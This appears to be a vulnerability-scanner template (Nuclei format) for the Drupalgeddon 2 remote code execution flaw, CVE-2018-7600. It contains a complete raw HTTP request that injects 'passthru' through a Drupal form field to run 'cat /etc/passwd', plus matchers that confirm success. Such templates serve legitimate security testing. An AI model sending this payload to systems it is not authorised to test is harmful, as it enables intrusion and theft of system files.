id: CVE-2018-7600

info:
  name: Drupal Drupalgeddon 2 RCE
  author: pikpikcu
  severity: critical
  reference: https://github.com/vulhub/vulhub/tree/master/drupal/CVE-2018-7600
  tags: cve,cve2018,drupal,rce

requests:
  - raw:
      - |
        POST /user/register?element_parents=account/mail/%23value&ajax_form=1&_wrapper_format=drupal_ajax HTTP/1.1
        Host:  {{Hostname}}
        User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0
        Accept: application/json
        Referer:  {{Hostname}}/user/register
        X-Requested-With: XMLHttpRequest
        Content-Type: multipart/form-data; boundary=---------------------------99533888113153068481322586663
        Content-Length: 626
        Connection: close

        -----------------------------99533888113153068481322586663
        Content-Disposition: form-data; name="mail[#post_render][]"

        passthru
        -----------------------------99533888113153068481322586663
        Content-Disposition: form-data; name="mail[#type]"

        markup
        -----------------------------99533888113153068481322586663
        Content-Disposition: form-data; name="mail[#markup]"

        cat /etc/passwd
        -----------------------------99533888113153068481322586663
        Content-Disposition: form-data; name="form_id"

        user_register_form
        -----------------------------99533888113153068481322586663
        Content-Disposition: form-data; name="_drupal_ajax"


    matchers-condition: and
    matchers:
      - type: word
        words:
          - "application/json"
        part: header

      - type: regex
        regex:
          - "root:[x*]:0:0"
        part: body

      - type: status
        status:
          - 200